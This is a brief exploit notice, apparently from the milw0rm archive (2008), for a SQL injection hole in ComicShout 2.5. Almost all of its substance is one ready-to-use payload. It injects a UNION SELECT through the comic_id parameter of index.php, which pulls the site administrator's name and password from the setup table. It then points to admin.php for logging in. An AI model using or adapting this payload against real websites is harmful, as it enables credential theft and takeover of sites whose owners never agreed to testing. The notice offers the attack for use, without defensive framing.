########################################################## # # ComicShout Remote 2.5 SQL Injection Vulnerability # # by D3m0n a.k.a Niiub # # Home: www.bl4ck-b0x-info # # niiub[at]bl4ck-b0x.info # ########################################################## ########################################################## Exploit: /index.php?comic_id=-1+UNION+SELECT+1,2,3,concat(site_admin,char(58),site_pass),5,6+FROM+setup/* Admin PA: admin.php ########################################################### Greetz: dun - sid_psycho - Kacper ########################################################### # milw0rm.com [2008-05-20]